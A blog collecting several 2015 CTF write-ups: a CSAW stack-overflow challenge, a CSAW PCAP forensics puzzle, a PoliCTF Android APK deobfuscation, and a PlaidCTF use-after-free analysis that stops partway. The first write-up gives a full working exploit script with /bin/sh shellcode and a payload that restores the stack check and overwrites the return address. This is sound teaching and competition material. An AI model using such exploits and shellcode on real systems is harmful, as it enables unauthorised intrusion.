Sunday, September 27, 2015

CSAW 2015 Quals: Exploitable 100 - Precision write-up

I worked on this challenge during the "CSAW 2015" as part of a CTF team called seven.

We are given a binary and need to exploit it on the remote system to get the flag.
First things first, let's check what type of protection we are dealing with.

# file precision_a8f6f0590c177948fe06c76a1831e650
precision_a8f6f0590c177948fe06c76a1831e650: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0xf2c69f92c3f6d68319ee39c0926e84bccdeb0371, not stripped

# /opt/checksec.sh --file precision_a8f6f0590c177948fe06c76a1831e650
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   precision_a8f6f0590c177948fe06c76a1831e650

Seems like no protection at all... since NX is disabled, it's probably a stack-based attack (e.g. a buffer overflow).
Sure enough, running the application a few times gives more insight into what we should do.

# ./precision_a8f6f0590c177948fe06c76a1831e650
Buff: 0xbfd01a48
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Got AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

# ./precision_a8f6f0590c177948fe06c76a1831e650
Buff: 0xbf83e488
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Nope

Looks like an ordinary echo app that just prints back whatever we type in. However, interestingly we get something that looks very much like an address on the stack (0xbf83e488).
This could be the address of the input buffer on the stack - but we'll need to confirm that to be sure.
Another interesting thing is that if we provide a long enough input, we get the message "Nope" instead of our original input.
Time to peek under the hood.

.text:0804851D ; int __cdecl main(int argc, const char **argv, const char **envp)
.text:0804851D                 public main
.text:0804851D main            proc near               
.text:0804851D
.text:0804851D argc            = dword ptr  8
.text:0804851D argv            = dword ptr  0Ch
.text:0804851D envp            = dword ptr  10h
.text:0804851D
.text:0804851D                 push    ebp
.text:0804851E                 mov     ebp, esp
.text:08048520                 and     esp, 0FFFFFFF0h
.text:08048523                 sub     esp, 0A0h
.text:08048529                 fld     ds:dbl_8048690
.text:0804852F                 fstp    qword ptr [esp+98h]
.text:08048536                 mov     eax, ds:stdout@@GLIBC_2_0
.text:0804853B                 mov     dword ptr [esp+0Ch], 0 ; n
.text:08048543                 mov     dword ptr [esp+8], 2 ; modes
.text:0804854B                 mov     dword ptr [esp+4], 0 ; buf
.text:08048553                 mov     [esp], eax      ; stream
.text:08048556                 call    _setvbuf
.text:0804855B                 lea     eax, [esp+18h]
.text:0804855F                 mov     [esp+4], eax
.text:08048563                 mov     dword ptr [esp], offset format ; "Buff: %p\n"
.text:0804856A                 call    _printf
.text:0804856F                 lea     eax, [esp+18h]
.text:08048573                 mov     [esp+4], eax
.text:08048577                 mov     dword ptr [esp], offset aS ; "%s"
.text:0804857E                 call    ___isoc99_scanf
.text:08048583                 fld     qword ptr [esp+98h]
.text:0804858A                 fld     ds:dbl_8048690
.text:08048590                 fucomip st, st(1)
.text:08048592                 fstp    st
.text:08048594                 jp      short loc_80485A9
.text:08048596                 fld     qword ptr [esp+98h]
.text:0804859D                 fld     ds:dbl_8048690
.text:080485A3                 fucomip st, st(1)
.text:080485A5                 fstp    st
.text:080485A7                 jz      short loc_80485C1
.text:080485A9
.text:080485A9 loc_80485A9:                            
.text:080485A9                 mov     dword ptr [esp], offset s ; "Nope"
.text:080485B0                 call    _puts
.text:080485B5                 mov     dword ptr [esp], 1 ; status
.text:080485BC                 call    _exit
.text:080485C1 ; ---------------------------------------------------------------------------
.text:080485C1
.text:080485C1 loc_80485C1:                            
.text:080485C1                 mov     eax, str
.text:080485C6                 lea     edx, [esp+18h]
.text:080485CA                 mov     [esp+4], edx
.text:080485CE                 mov     [esp], eax      ; format
.text:080485D1                 call    _printf
.text:080485D6                 leave
.text:080485D7                 retn
.text:080485D7 main            endp
It looks like we have some sort of primitive version of a stack cookie!
After taking the input, the app checks whether the stack still contains the value 64.33333 (which is located at dbl_8048690).
In memory the value is stored as the two dwords 0x475a31a5 0x40501555 (low dword first).
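As a quick sanity check, the two dwords can be reassembled into the double they encode. This is a minimal Python 3 sketch, not part of the original exploit; the constant names are mine, and it assumes the usual x86 little-endian layout with the low dword at the lower address.

```python
import struct

# The two dwords as they appear on the stack (low dword first on x86).
LOW_DWORD = 0x475a31a5
HIGH_DWORD = 0x40501555

# Pack them back to back in little-endian order, then reinterpret the
# resulting 8 bytes as an IEEE 754 double.
raw = struct.pack("<II", LOW_DWORD, HIGH_DWORD)
value = struct.unpack("<d", raw)[0]

print(raw.hex())  # the 8 bytes that have to be written back over the cookie
print(value)      # should be very close to 64.33333
```

The same 8 bytes are what an overflow has to reproduce at the cookie's position for the comparison to pass.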

And indeed, the leaked address is the address of our buffer on the stack. Guess we don't need to worry about ASLR  :)
Let's take a look at the stack

bfa8:a960|b775bb58|X.u.|
bfa8:a964|00000001|....|
bfa8:a968|00000000|....|
bfa8:a96c|00000001|....|
bfa8:a970|b777d908|..w.|
bfa8:a974|b75db8d0|..].|
bfa8:a978|bfa8aa84|....|
bfa8:a97c|bfa8c6c4|....|ASCII "precision_a8f6f0590c177948fe06c76a1831e650"
bfa8:a980|b76b2a37|7*k.|return to b76b2a37
bfa8:a984|b760b315|..`.|return to b760b315
bfa8:a988|0000002f|/...|
bfa8:a98c|b773bff4|..s.|
bfa8:a990|00000000|....|
bfa8:a994|bfa8aa30|0...|
bfa8:a998|b773cce0|..s.|
bfa8:a99c|08048385|....|return to 08048385
bfa8:a9a0|b776e590|..v.|
bfa8:a9a4|08048420| ...|
bfa8:a9a8|0804a000|....|
bfa8:a9ac|08048632|2...|return to 08048632
bfa8:a9b0|00000001|....|
bfa8:a9b4|bfa8aa84|....|
bfa8:a9b8|bfa8aa8c|....|
bfa8:a9bc|bfa8a9d8|....|
bfa8:a9c0|b760b515|..`.|return to b760b515
bfa8:a9c4|b776e590|..v.|
bfa8:a9c8|475a31a5|.1ZG|    <================================== This is the stack cookie
bfa8:a9cc|40501555|U.P@|    <================================== This is the stack cookie
bfa8:a9d0|080485e0|....|
bfa8:a9d4|00000000|....|
Since NX is not enabled for the stack, we can execute the shellcode once it is put on the stack. 
We only need to:
  1. keep in mind that the stack cookie sits at esp+0x98 (152), which is 128 bytes into our buffer at esp+0x18, so the payload must rewrite it with its original value
  2. jump to the buffer (payload) address on the stack and execute our shellcode
  3. find shellcode that makes it past _isoc99_scanf intact
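The layout implied by steps 1 and 2 can be sketched without pwntools. This is a Python 3 illustration under stated assumptions: the helper name build_payload and the one-byte placeholder shellcode are hypothetical, and the 12-byte gap between the cookie and the saved return address is simply the value used by the exploit script in this write-up.

```python
import struct

COOKIE = struct.pack("<II", 0x475a31a5, 0x40501555)  # 64.33333 as raw bytes
COOKIE_OFFSET = 0x98 - 0x18   # cookie at esp+0x98, buffer at esp+0x18 -> 128
FILLER_AFTER_COOKIE = 12      # gap before the saved return address (from the exploit)

def build_payload(buffer_address, shellcode):
    """Lay out: shellcode | padding | cookie | filler | return address."""
    if len(shellcode) > COOKIE_OFFSET:
        raise ValueError("shellcode does not fit in front of the cookie")
    payload = shellcode.ljust(COOKIE_OFFSET, b"A")   # pad up to the cookie
    payload += COOKIE                                 # keep the check happy
    payload += b"B" * FILLER_AFTER_COOKIE
    payload += struct.pack("<I", buffer_address)      # return into the buffer
    return payload

# 0xbf83e488 is one of the leaked "Buff:" values shown earlier;
# b"\xcc" (int3) is only a stand-in for real shellcode.
payload = build_payload(0xbf83e488, b"\xcc")
print(len(payload))
```

Because the buffer address changes on every run, it has to be parsed from the "Buff:" line of the live connection before the payload is built.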

The first two steps are nothing new - in my past posts I have shown how to easily find the offset at which the jump address (step 2) needs to be, so I will not repeat it this time...
A more interesting dilemma is step 3!
I tried generating numerous shellcodes with msfvenom, only to find that my shellcode gets split at various bad characters like 0x0b, 0x09, 0x20, and many more (scanf's %s stops reading at the first whitespace byte).
After a lot of trial and error, I finally got shellcode that gets past the _isoc99_scanf function.
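Checking candidate shellcode for these bad characters can be automated instead of done by trial and error. The following Python 3 sketch assumes the only problem bytes are the six whitespace characters that terminate a %s conversion in the C locale; the function name find_bad_bytes is mine.

```python
# Bytes that end a scanf("%s") conversion: space, \t, \n, \v, \f, \r.
SCANF_STOP_BYTES = frozenset(b" \t\n\v\f\r")

def find_bad_bytes(shellcode):
    """Return (offset, byte) pairs for every byte that would cut the input short."""
    return [(i, b) for i, b in enumerate(shellcode) if b in SCANF_STOP_BYTES]

# The shellcode used in the exploit script of this write-up, as hex.
shellcode = bytes.fromhex(
    "31c0b03001c430c050682f2f7368682f62696e89e3"
    "89c1b0b0c0e804cd80c0e803cd80"
)

print(len(shellcode), find_bad_bytes(shellcode))
print(find_bad_bytes(b"\x31\x0b\x20"))  # a deliberately broken sample
```

The packed cookie and return address travel through the same scanf call, so they are worth running through the same check.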
After putting it all together, we get the following exploit script:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
from struct import pack, unpack

MAGIC_VALUE_1 = 0x475a31a5
MAGIC_VALUE_2 = 0x40501555

shellcode="\x31\xc0\xb0\x30\x01\xc4\x30\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\xb0\xb0\xc0\xe8\x04\xcd\x80\xc0\xe8\x03\xcd\x80"

conn = remote("localhost", 4444) 
# conn = remote("54.173.98.115", 1259) 

received = conn.recvuntil("\n")
buffer_address = int(received[6:], 16)
log.info("Received: " + received)
log.info("Buffer is at %s" % hex(buffer_address))
esp = buffer_address - 0x18
log.info("ESP is: %s" % hex(esp))
magic_value_address = esp + 0x98
log.info("Magic value is at: %s" % hex(magic_value_address))
log.info("Shellcode length: %s" % len(shellcode))
shellcode_address = buffer_address + 152 + 24
#shellcode_address = shellcode_address-0xa0
log.info("Shellcode is at: %s" % hex(shellcode_address))

payload = shellcode + "A" * (152-24-len(shellcode)) +str(p32(MAGIC_VALUE_1))  + str(p32(MAGIC_VALUE_2)) + "B" * 12 + str(p32(buffer_address))
# payload = "A" * 10

log.info("Sending payload")
conn.sendline(payload)
conn.interactive()

Friday, September 25, 2015

CSAW 2015 Quals: Forensic 100 - Transfer write-up

I worked on this challenge during the "CSAW 2015" as part of a CTF team called seven.

We get a PCAP and need to find the hidden flag.
Looking at the traffic in the PCAP, there doesn't seem to be anything interesting ... a bunch of HTTP requests (some HTTPS, hence the TLS).


Seeing as how there were numerous requests towards Google, Facebook, Twitter, csaw.engineering.nyu.edu, and other sites... I tried the next logical thing and took a look at the files that were transferred. This is easily done using Wireshark's file export feature.

Sure enough, there are quite a few files to be seen. Here is a summary based on only the names and sizes of the files retrieved.


  • 4 files roughly 153KB in size, having the name %5c - probably the HTML source of the sites that were visited
  • 4 files roughly 24KB in size having the same name %5c - probably some CSS/JavaScript that came with the HTML source
  • 123 files roughly 1KB in size having the name object<number> - no idea what that would be...
  • 8 files roughly 1KB in size having the name %5c - probably various redirects (would make sense based on the 4+4 sites that were visited)
Looking at the files named %5c it's easy enough to confirm the above assumptions without taking too much time. Now for the hard part ... analyzing the many object<number> files ...


Luckily, opening up the very first one (in my case it's called object60) reveals a Python script!


import string
import random
from base64 import b64encode, b64decode

FLAG = 'flag{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}'

enc_ciphers = ['rot13', 'b64e', 'caesar']
# dec_ciphers = ['rot13', 'b64d', 'caesard']

def rot13(s):
 _rot13 = string.maketrans( 
     "ABCDEFGHIJKLMabcdefghijklmNOPQRSTUVWXYZnopqrstuvwxyz", 
     "NOPQRSTUVWXYZnopqrstuvwxyzABCDEFGHIJKLMabcdefghijklm")
 return string.translate(s, _rot13)

def b64e(s):
 return b64encode(s)

def caesar(plaintext, shift=3):
    alphabet = string.ascii_lowercase
    shifted_alphabet = alphabet[shift:] + alphabet[:shift]
    table = string.maketrans(alphabet, shifted_alphabet)
    return plaintext.translate(table)

def encode(pt, cnt=50):
 tmp = '2{}'.format(b64encode(pt))
 for cnt in xrange(cnt):
  c = random.choice(enc_ciphers)
  i = enc_ciphers.index(c) + 1
  _tmp = globals()[c](tmp)
  tmp = '{}{}'.format(i, _tmp)

 return tmp

if __name__ == '__main__':
 print encode(FLAG, cnt=?)

Well this looks promising! :)
It looks like a simple encoder/decoder, and it even has the flag template flag{xxx} embedded in it. There are four distinct functions here:

  • rot13 - a simple substitution cipher that replaces a letter with the letter 13 letters after it in the alphabet
  • b64e - a function that simply encodes a string to Base64
  • caesar - another simple substitution cipher that replaces a letter with the letter 3 letters after it in the alphabet (lowercase letters only)
  • encode - this seems to be the master function used to encode the flag (notice the call to encode in the main part of the script!). It first encodes the flag to Base64 and prepends the number 2, which matches the 1-based position of b64e in the enc_ciphers list. It then repeatedly picks a random function from enc_ciphers, applies it to the entire string (prefix included), and prepends the 1-based index of the function it used.

Obviously, we now have a way of decrypting the encrypted flag - we just need to find the string which was encoded. Looking at the rest of the object files, we see a bunch of seemingly random letters:

2Mk16Sk5iakYxVFZoS1RsWnZXbFZaYjFaa1prWmFkMDVWVGs1U2IyODFXa1ZuTUZadU1YVldiVkphVFVaS1dGWXlkbUZXTVdkMVprWnJWMlZHYzFsWGJscHVVekpOWVZaeFZsUmxWMnR5VkZabU5HaFdaM1pYY0hkdVRXOWFSMVJXYTA5V1YwcElhRVpTVm1WSGExUldWbHBrWm05dk5sSnZVbXhTVm5OWVZtNW1NV1l4V1dGVWJscFVaWEJoVjF

This seems to be our encrypted flag scattered across a bunch of files. As we can see, the number 2 at the beginning makes the first file (the one with the smallest number in object<number>) the first part of the encrypted string. 
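One detail matters when stitching the parts together: the files have to be ordered by their numeric suffix, not alphabetically, otherwise object100 would sort before object60. A minimal Python 3 sketch of that ordering (the helper name and the sample file names other than object60 are made up for illustration):

```python
PREFIX = "object"

def ordered_parts(names):
    """Keep only object<number> names and sort them by their numeric suffix."""
    parts = [n for n in names if n.startswith(PREFIX) and n[len(PREFIX):].isdigit()]
    return sorted(parts, key=lambda n: int(n[len(PREFIX):]))

names = ["object100", "%5c", "object60", "object7"]
print(sorted(names))          # plain string sort puts object100 first
print(ordered_parts(names))   # numeric sort gives the capture order
```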

First we need to create two decryption functions: b64d, caesard.
b64d is simple - we just call Python's b64decode to decode the Base64 string back to its original form.
caesard is also simple - we just use a -3 offset to revert the changes of the original caesar cipher.
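To convince yourself that the inverse functions really undo the encoder, a round trip on a dummy flag is enough. The sketch below is a Python 3 re-creation of the scheme (the captured script is Python 2), so the names ENCODERS, DECODERS, encode and decode are my own, and the fixed seed exists only to make the run repeatable.

```python
import codecs
import random
import string
from base64 import b64decode, b64encode

LOWER = string.ascii_lowercase

def rot13(text):
    return codecs.encode(text, "rot13")

def b64e(text):
    return b64encode(text.encode("ascii")).decode("ascii")

def b64d(text):
    return b64decode(text).decode("ascii")

def caesar(text, shift=3):
    # Lowercase letters only, like the captured script.
    return text.translate(str.maketrans(LOWER, LOWER[shift:] + LOWER[:shift]))

ENCODERS = [rot13, b64e, caesar]  # prefix digit is the index + 1
DECODERS = {"1": rot13, "2": b64d, "3": lambda t: caesar(t, -3)}

def encode(plaintext, rounds, rng):
    text = "2" + b64e(plaintext)
    for _ in range(rounds):
        index = rng.randrange(len(ENCODERS))
        text = str(index + 1) + ENCODERS[index](text)
    return text

def decode(text):
    # Peel one layer per leading digit until the prefix is no longer 1, 2 or 3.
    while text[:1] in DECODERS:
        text = DECODERS[text[0]](text[1:])
    return text

encoded = encode("flag{example}", 10, random.Random(0))
print(decode(encoded))
```

The loop stops on its own because the plaintext starts with "f", which is not a valid prefix digit; a plaintext beginning with 1, 2 or 3 would need an explicit round count instead.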

Adding it all together, we get the flag

flag{li0ns_and_tig3rs_4nd_b34rs_0h_mi}

Here is the Python script I used - enjoy ! :)

import string
from base64 import b64decode
import os

mypath = "D:\CTFs/CSAW_2015/forensic/100/files/"
files = [ f for f in os.listdir(mypath) if os.path.isfile(os.path.join(mypath,f)) ]

encodedParts = []
for file in files:
 if "object" in file:
  encodedParts.append(int(file[6:]))

encodedParts = sorted(encodedParts)

# remove first element since it is the script itself ...
encodedParts.pop(0) 
# print encodedParts

encodedFlag = ""
for file in encodedParts:
 pathToFile = mypath + "object" + str(file)
 encodedFlag += open(pathToFile, "r").read()
 
# print encodedFlag

dec_ciphers = ['rot13', 'b64d', 'caesard']

def rot13(s):
 _rot13 = string.maketrans( 
     "ABCDEFGHIJKLMabcdefghijklmNOPQRSTUVWXYZnopqrstuvwxyz", 
     "NOPQRSTUVWXYZnopqrstuvwxyzABCDEFGHIJKLMabcdefghijklm")
 return string.translate(s, _rot13)

def b64d(s):
 return b64decode(s)

def caesard(plaintext, shift=-3):
    alphabet = string.ascii_lowercase
    shifted_alphabet = alphabet[shift:] + alphabet[:shift]
    table = string.maketrans(alphabet, shifted_alphabet)
    return plaintext.translate(table)


while(1):
 if (encodedFlag[0] == "1"):
  encodedFlag = rot13(encodedFlag[1:])
 elif (encodedFlag[0] =="2"):
  encodedFlag = b64d(encodedFlag[1:])
 elif (encodedFlag[0] =="3"):
  encodedFlag = caesard(encodedFlag[1:])
 else:
  print "finished..."
  print encodedFlag
  exit()

Sunday, July 12, 2015

PoliCTF 2015: Crack Me If You Can - write-up

I worked on this challenge during the "PoliCTF 2015" as part of a CTF team called seven.

 We get an Android app called crack-me-if-you-can.apk, and are asked to extract the flag/password. First, I tried using apktool and APK Studio to decompile the application. Unfortunately, the APK seems to be corrupt, and the tools will not work!


 I opened the APK with 7Z (remember, APK is actually a ZIP file), and everything seemed to be in place. I tried the online version of the APK Decompiler, and luckily - it worked (thanks guys)!
Looking over the manifest, there does not seem to be anything special. We do however get a glimpse of the namespace (or package in Java) used: it.polictf2015.

<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="it.polictf2015" platformBuildVersionCode="21" platformBuildVersionName="5.0.1-1624448">
    <application android:allowBackup="true" android:icon="@mipmap/ic_launcher" android:label="@string/app_name" android:theme="@style/AppTheme">
        <activity android:label="@string/app_name" android:name="it.polictf2015.LoginActivity" android:windowSoftInputMode="stateVisible|adjustResize">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <meta-data android:name="com.google.android.gms.version" android:value="@integer/google_play_services_version"/>
    </application>
</manifest>

The actual decompiled source code is in the src folder. Using the namespace above it is easy to navigate to the correct location with four files:
  • a.java - seems irrelevant, probably just a handler
  • b.java - a single class (called b) which has a bunch of methods which take a string and replace certain characters
  • c.java - same as b.java, but with fewer methods
  • LoginActivity.java - this is the actual activity which presumably does all the work.
Looking over the source of the LoginActivity, we immediately see this string: flagging{It_cannot_be_easier_than_this}. Could it be this easy?!?!?!?

No... :)
This seems to be a red herring, and the fact that the string is being used as input to the replace function which changes "flagging" to "flag" does not help... :P
Actually, there are a bunch of methods that don't really seem to do much other than confuse us.

The only other method left is this one:

private boolean a(String s)
    {
        if (s.equals(c.a(it.polictf2015.b.a(it.polictf2015.b.b(it.polictf2015.b.c(it.polictf2015.b.d(it.polictf2015.b.g(it.polictf2015.b.h(it.polictf2015.b.e(it.polictf2015.b.f(it.polictf2015.b.i(c.c(c.b(c.d(getString(0x7f0c0038))))))))))))))))
        {
            Toast.makeText(getApplicationContext(), getString(0x7f0c003c), 1).show();
            return true;
        } else
        {
            return false;
        }
    }

This method seems to fetch a string from the resources, and then calls the replace methods embedded in the b and c classes. Even with all the nested calls, it's quite easy to follow the flow used to replace the string. The only thing missing is the actual string!
Looking at the extracted java files, there seems to be no R.java. So how do we get the string which is referenced with 0x7f0c0038?
I tried to search all the XML files in res folder for one of the strings being replaced - but that didn't work unfortunately!

Since apktool reported an error, that could mean some of the resources were not extracted. My last shot was to try and dig through the resources.arsc manually - which is what I did!
Opening the resources.arsc with a HEX editor and searching for the string "spdgj" got me this:


I extracted the whole string and ran the string replacement methods to get the flag: flag{Maybe_This_Obfuscation_Was_Not_That_Good_As_We_Thought}
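The manual hex-editor search can also be scripted. Strings in resources.arsc may be stored as UTF-8 or UTF-16, so this Python 3 sketch looks for both encodings; the function name find_string and the synthetic sample blob are mine, and the sketch only reports byte offsets rather than parsing the resource table.

```python
def find_string(data, needle):
    """Return byte offsets of needle in data for UTF-8 and UTF-16LE encodings."""
    hits = {}
    for encoding in ("utf-8", "utf-16-le"):
        pattern = needle.encode(encoding)
        offsets = []
        start = data.find(pattern)
        while start != -1:
            offsets.append(start)
            start = data.find(pattern, start + 1)
        hits[encoding] = offsets
    return hits

# Synthetic blob standing in for the real file contents.
sample = b"\x00\x01" + "Mc%spdgj=".encode("utf-8") + b"\x00" + "spdgj".encode("utf-16-le")
print(find_string(sample, "spdgj"))
```

Against the real file, data would come from open("resources.arsc", "rb").read(), and the reported offsets tell you where to start extracting the full string.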

Below is the Python script I used for all the string replacements and its output.

eefla{g}{Maybe_This_Obfuscation_Was_Not_That_Good_As_We_Thought}.eeala{g}{Maspdggfdj_This_ObRuscatiot_That_budsgad_As_We_Thought}Te3

my_string = "ee[[c%l][c{g}[%{%Mc%spdgj=]T%aat%=O%bRu%sc]c%ti[o%n=Wcs%=No[t=T][hct%=buga[d=As%=W]e=T%ho[u%[%g]h%t[%}%.ee[[c%l][c{g}[%{%Mc%spdggfdj=]T%aat%=O%bRu%sc]c%ti[o[t=T][hct%=budsga[d=As%=W]e=T%ho[u%[%g]h%t[%}%T[]e3"

my_string = my_string.replace("spdgj", "yb%e")
my_string = my_string.replace("aat", "his")
my_string = my_string.replace("buga", "Goo")

my_string = my_string.replace("=", "_")
my_string = my_string.replace("\\}", "",1)
my_string = my_string.replace("\\{", "",1)
my_string = my_string.replace("R", "f",1)
my_string = my_string.replace("c", "f",1)
my_string = my_string.replace("]", "")
my_string = my_string.replace("[", "")
my_string = my_string.replace("%", "")
my_string = my_string.replace("c", "a")
my_string = my_string.replace("aa", "ca")

print my_string

Wednesday, June 24, 2015

PlaidCTF Quals 2015 "prodmanager" - practice session write-up

This is another practice session write-up (disclaimer).
Today's challenge is called "prodmanager" and is from PlaidCTF Quals 2015.

You can download the ELF here.


Running the usual stuff first to see if we get anything interesting...

# file prodmanager 
prodmanager: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, stripped

# /opt/checksec.sh --file prodmanager 
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
No RELRO        No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   prodmanager

(I will omit strings since there is nothing special to see)

After trying to run the app we see that it requires a file named flag to be in the same folder as the binary. That's probably how it is set up on the target server, so it makes sense to mimic that locally. I created a file named flag with the following content:
This_is_My_Pretty_Dummy_flaaaag_!!!!1!

After that the app starts normally and gives us a menu and some info on top. You can play around with the app to get a feel for what it does - basically, it creates a list of products (each product has a name and a price) which can be added to a "manager", and you can view the 3 items with the lowest price. The only cryptic functionality is the "create profile", since it does not seem to do/print anything ...

Looking at the disassembly we can see the functions being used in the menu:
  • 0x08048C7B - main menu with the options
  • 0x08048852 - create product
  • 0x08048986 - remove product 
  • etc ...
After browsing around the assembly we see that the products are stored in a doubly linked list. This being a CTF challenge, it looks very much like a use-after-free vulnerability (which is the most common vulnerability when dealing with linked lists).

At this point I tried to confirm that this was indeed a use-after-free vulnerability by running a few tests. Since the main menu gives us the ability to manipulate (add & remove) the items in the linked list, and that we can view the content of the list with option no. 4, I quickly found the following PoC:
  1. First create at least 3 products (option no. 1 in main menu)
  2. Add the 3 products from above to the manager (option no. 3 in main menu)
  3. Remove any product (option no. 2 in main menu)
  4. View the lowest 3 products (option no. 4 in main menu)- this is where we see that there is indeed a use-after-free vulnerability

Menu options:
1) Create a new product 
2) Remove a product 
3) Add a product to the lowest price manager 
4) See and remove lowest 3 products in manager 
5) Create a profile (Not complete yet)
Input: 4
Lowest product is Milk
 ($21)
Lowest product is Sugar
 ($-1217022992)
Lowest product is Spice
 ($23)
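The odd price for Sugar is easier to read as an unsigned 32-bit value. A minimal Python 3 sketch of the conversion follows; the interpretation that this is a pointer written into the freed chunk is my assumption, not something the output proves.

```python
def as_unsigned32(value):
    """Reinterpret a signed 32-bit integer as unsigned."""
    return value & 0xFFFFFFFF

leaked = as_unsigned32(-1217022992)
print(hex(leaked))
```

The result lands in the 0xb7...... range, which on 32-bit Linux is typically where shared libraries are mapped, so the price field of the removed product has most likely been overwritten with an address after the free.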

Now that we know what we are dealing with, we can continue with the analysis. In order to get the flag we need to do the following things:
  1. Find out where and how the flag is being loaded from the filesystem (remember, we know that we need a file named flag in the same directory as the app - we need to inspect where the flag is in memory after it is read)
  2. Analyze the structure of the linked list which contains the use-after-free vulnerability (presumably we will need to inject a valid element into the linked list to exploit the use-after-free vulnerability)
  3. Find a valid entry point for the payload (at this point we don't know how to put the payload at the right place in memory)

Step 1 - finding the flag in memory
To make it easier to spot the flag, I changed it to a bunch of A's. From the read function assembly at 0x08048BD4, we can see that the flag is being loaded at offset 0x0804C3E0.
.text:08048C31                 mov     dword ptr [esp+8], offset unk_804C3E0
.text:08048C39                 mov     dword ptr [esp+4], offset aS ; "%s"
.text:08048C41                 mov     eax, [ebp+stream]
.text:08048C44                 mov     [esp], eax
.text:08048C47                 call    ___isoc99_fscanf

Looking at the memory dump, we can see the flag nicely!
0804:c3d0|00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00|................|
0804:c3e0|41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41|AAAAAAAAAAAAAAAA|
0804:c3f0|41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41|AAAAAAAAAAAAAAAA|
0804:c400|41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41|AAAAAAAAAAAAAAAA|
0804:c410|41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41|AAAAAAAAAAAAAAAA|
0804:c420|41 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00|AA..............|
0804:c430|00  

Step 2 - understand the linked list structure
Understandably, there are a lot of functions that operate on the linked list structure in this app. Although we do not see the original struct which was used, we can reverse engineer a rough idea of the struct by looking at how it is being used.


Perhaps the most promising function is located at 0x08048D54. It appears to be an initialization function which sets the price and the name of the product, and sets 5 other fields to zero. The price seems to be an integer value, while the name is a character array of length 0x32 (50) bytes. Now it would be useful to find out what these other 5 fields are used for.
int struct_init_8048D54(int alloc_space, char *prod_name, int price)
{
  int result; 
  *(_DWORD *)(alloc_space + 4) = 0;  
  *(_DWORD *)(alloc_space + 8) = 0;
  *(_DWORD *)(alloc_space + 12) = 0;
  *(_DWORD *)(alloc_space + 16) = 0;
  *(_DWORD *)(alloc_space + 20) = 0;
  strncpy((char *)(alloc_space + 24), prod_name, 0x32u);  // name
  result = alloc_space;
  *(_DWORD *)alloc_space = price;   // price
  return result;
}       

The function at offset 0x08048E7F seems to be used to retrieve the pointer to a product which contains a provided name. Looking at the way the list is being iterated i = * (i + 4), it is obvious that at offset 4 (second field) the struct contains a reference to the next struct in the list.
int get_by_name_8048E7F(int linkedList, char *product_name)
{
  int i;
  for ( i = *(_DWORD *)linkedList; i; i = *(_DWORD *)(i + 4) )
  {
    if ( !strncmp((const char *)(i + 24), product_name, 0x32u) )
      return i;
  }
  return 0;
}

So far so good! :)
The function at offset 0x08048E2C is invoked when removing an element from the list. From the function assembly we can easily see that at offset 8 (3rd field) the struct contains a reference to the previous element, which means that this is a doubly linked list.
int remove_from_linked_list_8048E2C(int orig_array, int to_remove)
{
  int result; 
  if ( *(_DWORD *)orig_array == to_remove )     // if to_remove element is equal to first element
    *(_DWORD *)orig_array = *(_DWORD *)(to_remove + 4);// just replace orig with next from to_remove
  else
    *(_DWORD *)(*(_DWORD *)(to_remove + 8) + 4) = *(_DWORD *)(to_remove + 4);// orig.next = to_remove.next
  if ( *(_DWORD *)(orig_array + 4) == to_remove )
  {
    result = orig_array;
    *(_DWORD *)(orig_array + 4) = *(_DWORD *)(to_remove + 8);
  }
  else
  {
    result = *(_DWORD *)(to_remove + 4);
    *(_DWORD *)(result + 8) = *(_DWORD *)(to_remove + 8);
  }
  return result;
}

Looking at the rest of the assembly code dealing with the list I could not make out what the other 3 fields actually do. The functions at 0x08048F0 and 0x080494A0 may hold a key to that answer. From the above analysis, we can conclude that the linked list elements look something like this:
alloc_space + 0    # price 
alloc_space + 4    # next   
alloc_space + 8    # previous
alloc_space + 12 
alloc_space + 16 
alloc_space + 20 
alloc_space + 24   #name (50)
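The recovered layout can be written down as a packed structure, which makes it easy to build or inspect elements by hand. This Python 3 sketch uses the standard struct module; the field names for the three unknown dwords and the helper names are placeholders of mine.

```python
import struct

# price (signed), next, prev, three unknown dwords, 50-byte name.
NODE = struct.Struct("<iIIIII50s")
FIELDS = ("price", "next", "prev", "unknown_12", "unknown_16", "unknown_20", "name")

def parse_node(raw):
    """Split a raw element into named fields and trim the name at the first NUL."""
    node = dict(zip(FIELDS, NODE.unpack(raw[:NODE.size])))
    node["name"] = node["name"].split(b"\x00", 1)[0]
    return node

def aligned_size(size, alignment=4):
    """Round size up to the next multiple of alignment."""
    return (size + alignment - 1) // alignment * alignment

raw = NODE.pack(21, 0, 0, 0, 0, 0, b"Milk")
print(NODE.size, aligned_size(NODE.size))
print(parse_node(raw))
```

The packed fields add up to 74 bytes, and rounding that to a 4-byte boundary gives 76 (0x4C), which is consistent with the allocation size seen in the create product function.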

Step 3 - find an entry point for the payload
